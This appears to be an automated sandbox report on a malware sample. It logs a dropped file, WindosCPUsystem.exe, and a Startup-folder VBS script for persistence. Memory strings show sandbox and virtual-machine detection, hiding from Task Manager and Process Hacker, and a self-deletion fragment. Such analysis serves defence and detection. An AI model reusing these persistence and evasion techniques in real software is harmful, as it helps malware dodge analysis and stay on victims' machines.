                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeJump to dropped file

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindosCPUsystem.vbsJump to dropped file
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindosCPUsystem.vbsJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindosCPUsystem.vbsJump to behavior

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: explorer.exe, 00000006.00000003.2237726271.00000000012E8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2479254183.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2832441496.00000000012EB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2810758230.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2811067450.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2263312897.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3251671714.00000000012DE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2270800960.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2996719613.00000000012D8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3378093722.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2270125052.00000000012F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
                Source: explorer.exe, 00000006.00000003.3251671714.00000000012DE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3251273544.00000000012D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXEEM
                Source: WindosCPUsystem.exe, 00000009.00000002.2333963744.0000022790D6C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: EXPLORER SBIEDLL.DLL!CUCKOOMON.DLL"WIN32_PROCESS.HANDLE='{0}'#PARENTPROCESSID
                Source: explorer.exe, 00000006.00000002.3378093722.00000000012D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXETORS
                Source: file.exe, 00000000.00000002.2201146076.0000026B4888C000.00000004.00000800.00020000.00000000.sdmp, WindosCPUsystem.exe, 00000009.00000002.2333963744.0000022790D6C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                Source: file.exe, 00000000.00000002.2201146076.0000026B4888C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: EXPLORER SBIEDLL.DLL!CUCKOOMON.DLL"WIN32_PROCESS.HANDLE='{0}'#PARENTPROCESSID$CMD%SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE&VERSION'SERIALNUMBER)VMWARE|VIRTUAL|A M I|XEN*SELECT * FROM WIN32_COMPUTERSYSTEM+MANUFACTURER,MODEL-MICROSOFT|VMWARE|VIRTUAL.JOHN/ANNA0XXXXXXXXEPOWERSHELLVSTART-SLEEP -SECONDS 5; REMOVE-ITEM -PATH '
                Source: explorer.exe, 00000006.00000003.2237726271.00000000012E8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2236864354.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2238292077.00000000012E1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2236654935.000000000132C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "STEALTH-TARGETS": "TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE",
                Source: explorer.exe, 00000006.00000003.2237726271.00000000012E8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2479254183.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2832441496.00000000012EB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2810758230.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2811067450.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2263312897.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3251671714.00000000012DE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2270800960.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2996719613.00000000012D8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3378093722.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2270125052.00000000012F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE@N0
                Source: explorer.exe, 00000006.00000003.2237726271.00000000012E8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2479254183.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2832441496.00000000012EB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2810758230.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2811067450.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2263312897.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3251671714.00000000012DE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2270800960.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2996719613.00000000012D8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3378093722.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2270125052.00000000012F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
                Source: explorer.exe, 00000006.00000003.2996719613.00000000012D8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2996970093.0000000001311000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE8
                Source: C:\Users\user\Desktop\file.exeMemory allocated: 26B46FB0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory allocated: 26B60820000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeMemory allocated: 2278F310000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeMemory allocated: 227A8D00000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5131Jump to behavior
